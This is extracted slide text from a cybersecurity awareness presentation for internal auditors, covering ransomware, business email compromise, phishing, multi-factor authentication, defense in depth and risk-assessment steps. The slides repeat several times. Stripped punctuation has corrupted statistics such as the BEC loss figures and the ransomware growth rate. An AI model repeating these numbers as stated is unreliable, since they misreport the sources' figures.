bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
